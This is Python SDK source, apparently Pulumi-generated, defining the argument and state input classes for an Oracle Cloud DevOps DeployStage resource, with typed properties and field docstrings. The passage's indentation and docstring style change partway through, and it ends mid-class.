class DeployStageArgs:
def __init__(__self__, *,
deploy_pipeline_id: pulumi.Input[str],
deploy_stage_predecessor_collection: pulumi.Input['DeployStageDeployStagePredecessorCollectionArgs'],
deploy_stage_type: pulumi.Input[str],
approval_policy: Optional[pulumi.Input['DeployStageApprovalPolicyArgs']] = None,
blue_backend_ips: Optional[pulumi.Input['DeployStageBlueBackendIpsArgs']] = None,
compute_instance_group_deploy_environment_id: Optional[pulumi.Input[str]] = None,
config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deploy_artifact_id: Optional[pulumi.Input[str]] = None,
deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
deployment_spec_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
docker_image_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
failure_policy: Optional[pulumi.Input['DeployStageFailurePolicyArgs']] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
function_deploy_environment_id: Optional[pulumi.Input[str]] = None,
function_timeout_in_seconds: Optional[pulumi.Input[int]] = None,
green_backend_ips: Optional[pulumi.Input['DeployStageGreenBackendIpsArgs']] = None,
is_async: Optional[pulumi.Input[bool]] = None,
is_validation_enabled: Optional[pulumi.Input[bool]] = None,
kubernetes_manifest_deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
load_balancer_config: Optional[pulumi.Input['DeployStageLoadBalancerConfigArgs']] = None,
max_memory_in_mbs: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
oke_cluster_deploy_environment_id: Optional[pulumi.Input[str]] = None,
rollback_policy: Optional[pulumi.Input['DeployStageRollbackPolicyArgs']] = None,
rollout_policy: Optional[pulumi.Input['DeployStageRolloutPolicyArgs']] = None,
traffic_shift_target: Optional[pulumi.Input[str]] = None,
wait_criteria: Optional[pulumi.Input['DeployStageWaitCriteriaArgs']] = None):
"""
The set of arguments for constructing a DeployStage resource.
:param pulumi.Input[str] deploy_pipeline_id: The OCID of a pipeline.
:param pulumi.Input['DeployStageDeployStagePredecessorCollectionArgs'] deploy_stage_predecessor_collection: (Updatable) Collection containing the predecessors of a stage.
:param pulumi.Input[str] deploy_stage_type: (Updatable) Deployment stage type.
:param pulumi.Input['DeployStageApprovalPolicyArgs'] approval_policy: (Updatable) Specifies the approval policy.
:param pulumi.Input['DeployStageBlueBackendIpsArgs'] blue_backend_ips: (Updatable) Collection of backend environment IP addresses.
:param pulumi.Input[str] compute_instance_group_deploy_environment_id: (Updatable) A compute instance group environment OCID for rolling deployment.
:param pulumi.Input[Mapping[str, Any]] config: (Updatable) User provided key and value pair configuration, which is assigned through constants or parameter.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deploy_artifact_id: (Updatable) Optional binary artifact OCID user may provide to this stage.
:param pulumi.Input[Sequence[pulumi.Input[str]]] deploy_artifact_ids: (Updatable) Additional file artifact OCIDs.
:param pulumi.Input[str] deployment_spec_deploy_artifact_id: (Updatable) The OCID of the artifact that contains the deployment specification.
:param pulumi.Input[str] description: (Updatable) Optional description about the deployment stage.
:param pulumi.Input[str] display_name: (Updatable) Deployment stage display name, which can be renamed and is not necessarily unique. Avoid entering confidential information.
:param pulumi.Input[str] docker_image_deploy_artifact_id: (Updatable) A Docker image artifact OCID.
:param pulumi.Input['DeployStageFailurePolicyArgs'] failure_policy: (Updatable) Specifies a failure policy for a compute instance group rolling deployment stage.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
:param pulumi.Input[str] function_deploy_environment_id: (Updatable) Function environment OCID.
:param pulumi.Input[int] function_timeout_in_seconds: (Updatable) Timeout for execution of the Function. Value in seconds.
:param pulumi.Input['DeployStageGreenBackendIpsArgs'] green_backend_ips: (Updatable) Collection of backend environment IP addresses.
:param pulumi.Input[bool] is_async: (Updatable) A boolean flag specifies whether this stage executes asynchronously.
:param pulumi.Input[bool] is_validation_enabled: (Updatable) A boolean flag specifies whether the invoked function should be validated.
:param pulumi.Input[Sequence[pulumi.Input[str]]] kubernetes_manifest_deploy_artifact_ids: (Updatable) List of Kubernetes manifest artifact OCIDs, the manifests should not include any job resource.
:param pulumi.Input['DeployStageLoadBalancerConfigArgs'] load_balancer_config: (Updatable) Specifies config for load balancer traffic shift stages.
:param pulumi.Input[str] max_memory_in_mbs: (Updatable) Maximum usable memory for the Function (in MB).
:param pulumi.Input[str] namespace: (Updatable) Default namespace to be used for Kubernetes deployment when not specified in the manifest.
:param pulumi.Input[str] oke_cluster_deploy_environment_id: (Updatable) Kubernetes cluster environment OCID for deployment.
:param pulumi.Input['DeployStageRollbackPolicyArgs'] rollback_policy: (Updatable) Specifies the rollback policy. This is initiated on the failure of certain stage types.
:param pulumi.Input['DeployStageRolloutPolicyArgs'] rollout_policy: (Updatable) Description of rollout policy for load balancer traffic shift stage.
:param pulumi.Input[str] traffic_shift_target: (Updatable) Specifies the target or destination backend set.
:param pulumi.Input['DeployStageWaitCriteriaArgs'] wait_criteria: (Updatable) Specifies wait criteria for the Wait stage.
"""
pulumi.set(__self__, "deploy_pipeline_id", deploy_pipeline_id)
pulumi.set(__self__, "deploy_stage_predecessor_collection", deploy_stage_predecessor_collection)
pulumi.set(__self__, "deploy_stage_type", deploy_stage_type)
if approval_policy is not None:
pulumi.set(__self__, "approval_policy", approval_policy)
if blue_backend_ips is not None:
pulumi.set(__self__, "blue_backend_ips", blue_backend_ips)
if compute_instance_group_deploy_environment_id is not None:
pulumi.set(__self__, "compute_instance_group_deploy_environment_id", compute_instance_group_deploy_environment_id)
if config is not None:
pulumi.set(__self__, "config", config)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if deploy_artifact_id is not None:
pulumi.set(__self__, "deploy_artifact_id", deploy_artifact_id)
if deploy_artifact_ids is not None:
pulumi.set(__self__, "deploy_artifact_ids", deploy_artifact_ids)
if deployment_spec_deploy_artifact_id is not None:
pulumi.set(__self__, "deployment_spec_deploy_artifact_id", deployment_spec_deploy_artifact_id)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if docker_image_deploy_artifact_id is not None:
pulumi.set(__self__, "docker_image_deploy_artifact_id", docker_image_deploy_artifact_id)
if failure_policy is not None:
pulumi.set(__self__, "failure_policy", failure_policy)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if function_deploy_environment_id is not None:
pulumi.set(__self__, "function_deploy_environment_id", function_deploy_environment_id)
if function_timeout_in_seconds is not None:
pulumi.set(__self__, "function_timeout_in_seconds", function_timeout_in_seconds)
if green_backend_ips is not None:
pulumi.set(__self__, "green_backend_ips", green_backend_ips)
if is_async is not None:
pulumi.set(__self__, "is_async", is_async)
if is_validation_enabled is not None:
pulumi.set(__self__, "is_validation_enabled", is_validation_enabled)
if kubernetes_manifest_deploy_artifact_ids is not None:
pulumi.set(__self__, "kubernetes_manifest_deploy_artifact_ids", kubernetes_manifest_deploy_artifact_ids)
if load_balancer_config is not None:
pulumi.set(__self__, "load_balancer_config", load_balancer_config)
if max_memory_in_mbs is not None:
pulumi.set(__self__, "max_memory_in_mbs", max_memory_in_mbs)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if oke_cluster_deploy_environment_id is not None:
pulumi.set(__self__, "oke_cluster_deploy_environment_id", oke_cluster_deploy_environment_id)
if rollback_policy is not None:
pulumi.set(__self__, "rollback_policy", rollback_policy)
if rollout_policy is not None:
pulumi.set(__self__, "rollout_policy", rollout_policy)
if traffic_shift_target is not None:
pulumi.set(__self__, "traffic_shift_target", traffic_shift_target)
if wait_criteria is not None:
pulumi.set(__self__, "wait_criteria", wait_criteria)
@property
@pulumi.getter(name="deployPipelineId")
def deploy_pipeline_id(self) -> pulumi.Input[str]:
"""
The OCID of a pipeline.
"""
return pulumi.get(self, "deploy_pipeline_id")
@deploy_pipeline_id.setter
def deploy_pipeline_id(self, value: pulumi.Input[str]):
pulumi.set(self, "deploy_pipeline_id", value)
@property
@pulumi.getter(name="deployStagePredecessorCollection")
def deploy_stage_predecessor_collection(self) -> pulumi.Input['DeployStageDeployStagePredecessorCollectionArgs']:
"""
(Updatable) Collection containing the predecessors of a stage.
"""
return pulumi.get(self, "deploy_stage_predecessor_collection")
@deploy_stage_predecessor_collection.setter
def deploy_stage_predecessor_collection(self, value: pulumi.Input['DeployStageDeployStagePredecessorCollectionArgs']):
pulumi.set(self, "deploy_stage_predecessor_collection", value)
@property
@pulumi.getter(name="deployStageType")
def deploy_stage_type(self) -> pulumi.Input[str]:
"""
(Updatable) Deployment stage type.
"""
return pulumi.get(self, "deploy_stage_type")
@deploy_stage_type.setter
def deploy_stage_type(self, value: pulumi.Input[str]):
pulumi.set(self, "deploy_stage_type", value)
@property
@pulumi.getter(name="approvalPolicy")
def approval_policy(self) -> Optional[pulumi.Input['DeployStageApprovalPolicyArgs']]:
"""
(Updatable) Specifies the approval policy.
"""
return pulumi.get(self, "approval_policy")
@approval_policy.setter
def approval_policy(self, value: Optional[pulumi.Input['DeployStageApprovalPolicyArgs']]):
pulumi.set(self, "approval_policy", value)
@property
@pulumi.getter(name="blueBackendIps")
def blue_backend_ips(self) -> Optional[pulumi.Input['DeployStageBlueBackendIpsArgs']]:
"""
(Updatable) Collection of backend environment IP addresses.
"""
return pulumi.get(self, "blue_backend_ips")
@blue_backend_ips.setter
def blue_backend_ips(self, value: Optional[pulumi.Input['DeployStageBlueBackendIpsArgs']]):
pulumi.set(self, "blue_backend_ips", value)
@property
@pulumi.getter(name="computeInstanceGroupDeployEnvironmentId")
def compute_instance_group_deploy_environment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A compute instance group environment OCID for rolling deployment.
"""
return pulumi.get(self, "compute_instance_group_deploy_environment_id")
@compute_instance_group_deploy_environment_id.setter
def compute_instance_group_deploy_environment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compute_instance_group_deploy_environment_id", value)
@property
@pulumi.getter
def config(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) User provided key and value pair configuration, which is assigned through constants or parameter.
"""
return pulumi.get(self, "config")
@config.setter
def config(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "config", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="deployArtifactId")
def deploy_artifact_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Optional binary artifact OCID user may provide to this stage.
"""
return pulumi.get(self, "deploy_artifact_id")
@deploy_artifact_id.setter
def deploy_artifact_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deploy_artifact_id", value)
@property
@pulumi.getter(name="deployArtifactIds")
def deploy_artifact_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) Additional file artifact OCIDs.
"""
return pulumi.get(self, "deploy_artifact_ids")
@deploy_artifact_ids.setter
def deploy_artifact_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "deploy_artifact_ids", value)
@property
@pulumi.getter(name="deploymentSpecDeployArtifactId")
def deployment_spec_deploy_artifact_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the artifact that contains the deployment specification.
"""
return pulumi.get(self, "deployment_spec_deploy_artifact_id")
@deployment_spec_deploy_artifact_id.setter
def deployment_spec_deploy_artifact_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deployment_spec_deploy_artifact_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Optional description about the deployment stage.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Deployment stage display name, which can be renamed and is not necessarily unique. Avoid entering confidential information.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="dockerImageDeployArtifactId")
def docker_image_deploy_artifact_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A Docker image artifact OCID.
"""
return pulumi.get(self, "docker_image_deploy_artifact_id")
@docker_image_deploy_artifact_id.setter
def docker_image_deploy_artifact_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "docker_image_deploy_artifact_id", value)
@property
@pulumi.getter(name="failurePolicy")
def failure_policy(self) -> Optional[pulumi.Input['DeployStageFailurePolicyArgs']]:
    """(Updatable) Failure policy for a compute instance group rolling deployment stage."""
    return pulumi.get(self, "failure_policy")

@failure_policy.setter
def failure_policy(self, failure_policy: Optional[pulumi.Input['DeployStageFailurePolicyArgs']]):
    pulumi.set(self, "failure_policy", failure_policy)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
    """
    (Updatable) Simple key-value pairs applied without predefined name, type, or scope;
    exists for cross-compatibility only. See
    [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
    Example: `{"bar-key": "value"}`
    """
    return pulumi.get(self, "freeform_tags")

@freeform_tags.setter
def freeform_tags(self, freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]]):
    pulumi.set(self, "freeform_tags", freeform_tags)
@property
@pulumi.getter(name="functionDeployEnvironmentId")
def function_deploy_environment_id(self) -> Optional[pulumi.Input[str]]:
    """(Updatable) Function environment OCID."""
    return pulumi.get(self, "function_deploy_environment_id")

@function_deploy_environment_id.setter
def function_deploy_environment_id(self, function_deploy_environment_id: Optional[pulumi.Input[str]]):
    pulumi.set(self, "function_deploy_environment_id", function_deploy_environment_id)
@property
@pulumi.getter(name="functionTimeoutInSeconds")
def function_timeout_in_seconds(self) -> Optional[pulumi.Input[int]]:
    """(Updatable) Timeout for Function execution, in seconds."""
    return pulumi.get(self, "function_timeout_in_seconds")

@function_timeout_in_seconds.setter
def function_timeout_in_seconds(self, function_timeout_in_seconds: Optional[pulumi.Input[int]]):
    pulumi.set(self, "function_timeout_in_seconds", function_timeout_in_seconds)
@property
@pulumi.getter(name="greenBackendIps")
def green_backend_ips(self) -> Optional[pulumi.Input['DeployStageGreenBackendIpsArgs']]:
    """(Updatable) Collection of backend environment IP addresses."""
    return pulumi.get(self, "green_backend_ips")

@green_backend_ips.setter
def green_backend_ips(self, green_backend_ips: Optional[pulumi.Input['DeployStageGreenBackendIpsArgs']]):
    pulumi.set(self, "green_backend_ips", green_backend_ips)
@property
@pulumi.getter(name="isAsync")
def is_async(self) -> Optional[pulumi.Input[bool]]:
    """(Updatable) Whether this stage executes asynchronously."""
    return pulumi.get(self, "is_async")

@is_async.setter
def is_async(self, is_async: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "is_async", is_async)
@property
@pulumi.getter(name="isValidationEnabled")
def is_validation_enabled(self) -> Optional[pulumi.Input[bool]]:
    """(Updatable) Whether the invoked function should be validated."""
    return pulumi.get(self, "is_validation_enabled")

@is_validation_enabled.setter
def is_validation_enabled(self, is_validation_enabled: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "is_validation_enabled", is_validation_enabled)
@property
@pulumi.getter(name="kubernetesManifestDeployArtifactIds")
def kubernetes_manifest_deploy_artifact_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
    """(Updatable) Kubernetes manifest artifact OCIDs; the manifests should not include any job resource."""
    return pulumi.get(self, "kubernetes_manifest_deploy_artifact_ids")

@kubernetes_manifest_deploy_artifact_ids.setter
def kubernetes_manifest_deploy_artifact_ids(self, kubernetes_manifest_deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
    pulumi.set(self, "kubernetes_manifest_deploy_artifact_ids", kubernetes_manifest_deploy_artifact_ids)
@property
@pulumi.getter(name="loadBalancerConfig")
def load_balancer_config(self) -> Optional[pulumi.Input['DeployStageLoadBalancerConfigArgs']]:
    """(Updatable) Config for load balancer traffic shift stages."""
    return pulumi.get(self, "load_balancer_config")

@load_balancer_config.setter
def load_balancer_config(self, load_balancer_config: Optional[pulumi.Input['DeployStageLoadBalancerConfigArgs']]):
    pulumi.set(self, "load_balancer_config", load_balancer_config)
@property
@pulumi.getter(name="maxMemoryInMbs")
def max_memory_in_mbs(self) -> Optional[pulumi.Input[str]]:
    """(Updatable) Maximum usable memory for the Function, in MB."""
    return pulumi.get(self, "max_memory_in_mbs")

@max_memory_in_mbs.setter
def max_memory_in_mbs(self, max_memory_in_mbs: Optional[pulumi.Input[str]]):
    pulumi.set(self, "max_memory_in_mbs", max_memory_in_mbs)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
    """(Updatable) Default namespace for Kubernetes deployment when the manifest does not specify one."""
    return pulumi.get(self, "namespace")

@namespace.setter
def namespace(self, namespace: Optional[pulumi.Input[str]]):
    pulumi.set(self, "namespace", namespace)
@property
@pulumi.getter(name="okeClusterDeployEnvironmentId")
def oke_cluster_deploy_environment_id(self) -> Optional[pulumi.Input[str]]:
    """(Updatable) Kubernetes cluster environment OCID for deployment."""
    return pulumi.get(self, "oke_cluster_deploy_environment_id")

@oke_cluster_deploy_environment_id.setter
def oke_cluster_deploy_environment_id(self, oke_cluster_deploy_environment_id: Optional[pulumi.Input[str]]):
    pulumi.set(self, "oke_cluster_deploy_environment_id", oke_cluster_deploy_environment_id)
@property
@pulumi.getter(name="rollbackPolicy")
def rollback_policy(self) -> Optional[pulumi.Input['DeployStageRollbackPolicyArgs']]:
    """(Updatable) Rollback policy; initiated on failure of certain stage types."""
    return pulumi.get(self, "rollback_policy")

@rollback_policy.setter
def rollback_policy(self, rollback_policy: Optional[pulumi.Input['DeployStageRollbackPolicyArgs']]):
    pulumi.set(self, "rollback_policy", rollback_policy)
@property
@pulumi.getter(name="rolloutPolicy")
def rollout_policy(self) -> Optional[pulumi.Input['DeployStageRolloutPolicyArgs']]:
    """(Updatable) Rollout policy for a load balancer traffic shift stage."""
    return pulumi.get(self, "rollout_policy")

@rollout_policy.setter
def rollout_policy(self, rollout_policy: Optional[pulumi.Input['DeployStageRolloutPolicyArgs']]):
    pulumi.set(self, "rollout_policy", rollout_policy)
@property
@pulumi.getter(name="trafficShiftTarget")
def traffic_shift_target(self) -> Optional[pulumi.Input[str]]:
    """(Updatable) Target or destination backend set."""
    return pulumi.get(self, "traffic_shift_target")

@traffic_shift_target.setter
def traffic_shift_target(self, traffic_shift_target: Optional[pulumi.Input[str]]):
    pulumi.set(self, "traffic_shift_target", traffic_shift_target)
@property
@pulumi.getter(name="waitCriteria")
def wait_criteria(self) -> Optional[pulumi.Input['DeployStageWaitCriteriaArgs']]:
    """(Updatable) Wait criteria for the Wait stage."""
    return pulumi.get(self, "wait_criteria")

@wait_criteria.setter
def wait_criteria(self, wait_criteria: Optional[pulumi.Input['DeployStageWaitCriteriaArgs']]):
    pulumi.set(self, "wait_criteria", wait_criteria)
@pulumi.input_type
class _DeployStageState:
    """State-input type used for looking up and filtering DeployStage resources."""

    def __init__(__self__, *,
                 approval_policy: Optional[pulumi.Input['DeployStageApprovalPolicyArgs']] = None,
                 blue_backend_ips: Optional[pulumi.Input['DeployStageBlueBackendIpsArgs']] = None,
                 compartment_id: Optional[pulumi.Input[str]] = None,
                 compute_instance_group_deploy_environment_id: Optional[pulumi.Input[str]] = None,
                 config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 deploy_artifact_id: Optional[pulumi.Input[str]] = None,
                 deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 deploy_pipeline_id: Optional[pulumi.Input[str]] = None,
                 deploy_stage_predecessor_collection: Optional[pulumi.Input['DeployStageDeployStagePredecessorCollectionArgs']] = None,
                 deploy_stage_type: Optional[pulumi.Input[str]] = None,
                 deployment_spec_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 docker_image_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
                 failure_policy: Optional[pulumi.Input['DeployStageFailurePolicyArgs']] = None,
                 freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 function_deploy_environment_id: Optional[pulumi.Input[str]] = None,
                 function_timeout_in_seconds: Optional[pulumi.Input[int]] = None,
                 green_backend_ips: Optional[pulumi.Input['DeployStageGreenBackendIpsArgs']] = None,
                 is_async: Optional[pulumi.Input[bool]] = None,
                 is_validation_enabled: Optional[pulumi.Input[bool]] = None,
                 kubernetes_manifest_deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 lifecycle_details: Optional[pulumi.Input[str]] = None,
                 load_balancer_config: Optional[pulumi.Input['DeployStageLoadBalancerConfigArgs']] = None,
                 max_memory_in_mbs: Optional[pulumi.Input[str]] = None,
                 namespace: Optional[pulumi.Input[str]] = None,
                 oke_cluster_deploy_environment_id: Optional[pulumi.Input[str]] = None,
                 project_id: Optional[pulumi.Input[str]] = None,
                 rollback_policy: Optional[pulumi.Input['DeployStageRollbackPolicyArgs']] = None,
                 rollout_policy: Optional[pulumi.Input['DeployStageRolloutPolicyArgs']] = None,
                 state: Optional[pulumi.Input[str]] = None,
                 system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 time_created: Optional[pulumi.Input[str]] = None,
                 time_updated: Optional[pulumi.Input[str]] = None,
                 traffic_shift_target: Optional[pulumi.Input[str]] = None,
                 wait_criteria: Optional[pulumi.Input['DeployStageWaitCriteriaArgs']] = None):
        """
        Input properties used for looking up and filtering DeployStage resources.

        :param pulumi.Input['DeployStageApprovalPolicyArgs'] approval_policy: (Updatable) Specifies the approval policy.
        :param pulumi.Input['DeployStageBlueBackendIpsArgs'] blue_backend_ips: (Updatable) Collection of backend environment IP addresses.
        :param pulumi.Input[str] compartment_id: The OCID of a compartment.
        :param pulumi.Input[str] compute_instance_group_deploy_environment_id: (Updatable) A compute instance group environment OCID for rolling deployment.
        :param pulumi.Input[Mapping[str, Any]] config: (Updatable) User provided key and value pair configuration, which is assigned through constants or parameter.
        :param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
        :param pulumi.Input[str] deploy_artifact_id: (Updatable) Optional binary artifact OCID user may provide to this stage.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] deploy_artifact_ids: (Updatable) Additional file artifact OCIDs.
        :param pulumi.Input[str] deploy_pipeline_id: The OCID of a pipeline.
        :param pulumi.Input['DeployStageDeployStagePredecessorCollectionArgs'] deploy_stage_predecessor_collection: (Updatable) Collection containing the predecessors of a stage.
        :param pulumi.Input[str] deploy_stage_type: (Updatable) Deployment stage type.
        :param pulumi.Input[str] deployment_spec_deploy_artifact_id: (Updatable) The OCID of the artifact that contains the deployment specification.
        :param pulumi.Input[str] description: (Updatable) Optional description about the deployment stage.
        :param pulumi.Input[str] display_name: (Updatable) Deployment stage display name, which can be renamed and is not necessarily unique. Avoid entering confidential information.
        :param pulumi.Input[str] docker_image_deploy_artifact_id: (Updatable) A Docker image artifact OCID.
        :param pulumi.Input['DeployStageFailurePolicyArgs'] failure_policy: (Updatable) Specifies a failure policy for a compute instance group rolling deployment stage.
        :param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
        :param pulumi.Input[str] function_deploy_environment_id: (Updatable) Function environment OCID.
        :param pulumi.Input[int] function_timeout_in_seconds: (Updatable) Timeout for execution of the Function. Value in seconds.
        :param pulumi.Input['DeployStageGreenBackendIpsArgs'] green_backend_ips: (Updatable) Collection of backend environment IP addresses.
        :param pulumi.Input[bool] is_async: (Updatable) A boolean flag specifies whether this stage executes asynchronously.
        :param pulumi.Input[bool] is_validation_enabled: (Updatable) A boolean flag specifies whether the invoked function should be validated.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] kubernetes_manifest_deploy_artifact_ids: (Updatable) List of Kubernetes manifest artifact OCIDs, the manifests should not include any job resource.
        :param pulumi.Input[str] lifecycle_details: A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
        :param pulumi.Input['DeployStageLoadBalancerConfigArgs'] load_balancer_config: (Updatable) Specifies config for load balancer traffic shift stages.
        :param pulumi.Input[str] max_memory_in_mbs: (Updatable) Maximum usable memory for the Function (in MB).
        :param pulumi.Input[str] namespace: (Updatable) Default namespace to be used for Kubernetes deployment when not specified in the manifest.
        :param pulumi.Input[str] oke_cluster_deploy_environment_id: (Updatable) Kubernetes cluster environment OCID for deployment.
        :param pulumi.Input[str] project_id: The OCID of a project.
        :param pulumi.Input['DeployStageRollbackPolicyArgs'] rollback_policy: (Updatable) Specifies the rollback policy. This is initiated on the failure of certain stage types.
        :param pulumi.Input['DeployStageRolloutPolicyArgs'] rollout_policy: (Updatable) Description of rollout policy for load balancer traffic shift stage.
        :param pulumi.Input[str] state: The current state of the deployment stage.
        :param pulumi.Input[Mapping[str, Any]] system_tags: Usage of system tag keys. These predefined keys are scoped to namespaces. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"orcl-cloud.free-tier-retained": "true"}`
        :param pulumi.Input[str] time_created: Time the deployment stage was created. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
        :param pulumi.Input[str] time_updated: Time the deployment stage was updated. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
        :param pulumi.Input[str] traffic_shift_target: (Updatable) Specifies the target or destination backend set.
        :param pulumi.Input['DeployStageWaitCriteriaArgs'] wait_criteria: (Updatable) Specifies wait criteria for the Wait stage.
        """
        # Register only the fields that were actually supplied. Dict insertion
        # order matches the parameter order, so the pulumi.set call sequence is
        # identical to the original unrolled if-chain.
        _fields = {
            "approval_policy": approval_policy,
            "blue_backend_ips": blue_backend_ips,
            "compartment_id": compartment_id,
            "compute_instance_group_deploy_environment_id": compute_instance_group_deploy_environment_id,
            "config": config,
            "defined_tags": defined_tags,
            "deploy_artifact_id": deploy_artifact_id,
            "deploy_artifact_ids": deploy_artifact_ids,
            "deploy_pipeline_id": deploy_pipeline_id,
            "deploy_stage_predecessor_collection": deploy_stage_predecessor_collection,
            "deploy_stage_type": deploy_stage_type,
            "deployment_spec_deploy_artifact_id": deployment_spec_deploy_artifact_id,
            "description": description,
            "display_name": display_name,
            "docker_image_deploy_artifact_id": docker_image_deploy_artifact_id,
            "failure_policy": failure_policy,
            "freeform_tags": freeform_tags,
            "function_deploy_environment_id": function_deploy_environment_id,
            "function_timeout_in_seconds": function_timeout_in_seconds,
            "green_backend_ips": green_backend_ips,
            "is_async": is_async,
            "is_validation_enabled": is_validation_enabled,
            "kubernetes_manifest_deploy_artifact_ids": kubernetes_manifest_deploy_artifact_ids,
            "lifecycle_details": lifecycle_details,
            "load_balancer_config": load_balancer_config,
            "max_memory_in_mbs": max_memory_in_mbs,
            "namespace": namespace,
            "oke_cluster_deploy_environment_id": oke_cluster_deploy_environment_id,
            "project_id": project_id,
            "rollback_policy": rollback_policy,
            "rollout_policy": rollout_policy,
            "state": state,
            "system_tags": system_tags,
            "time_created": time_created,
            "time_updated": time_updated,
            "traffic_shift_target": traffic_shift_target,
            "wait_criteria": wait_criteria,
        }
        for _key, _val in _fields.items():
            if _val is not None:
                pulumi.set(__self__, _key, _val)

    @property
    @pulumi.getter(name="approvalPolicy")
    def approval_policy(self) -> Optional[pulumi.Input['DeployStageApprovalPolicyArgs']]:
        """(Updatable) Specifies the approval policy."""
        return pulumi.get(self, "approval_policy")

    @approval_policy.setter
    def approval_policy(self, approval_policy: Optional[pulumi.Input['DeployStageApprovalPolicyArgs']]):
        pulumi.set(self, "approval_policy", approval_policy)

    @property
    @pulumi.getter(name="blueBackendIps")
    def blue_backend_ips(self) -> Optional[pulumi.Input['DeployStageBlueBackendIpsArgs']]:
        """(Updatable) Collection of backend environment IP addresses."""
        return pulumi.get(self, "blue_backend_ips")

    @blue_backend_ips.setter
    def blue_backend_ips(self, blue_backend_ips: Optional[pulumi.Input['DeployStageBlueBackendIpsArgs']]):
        pulumi.set(self, "blue_backend_ips", blue_backend_ips)

    @property
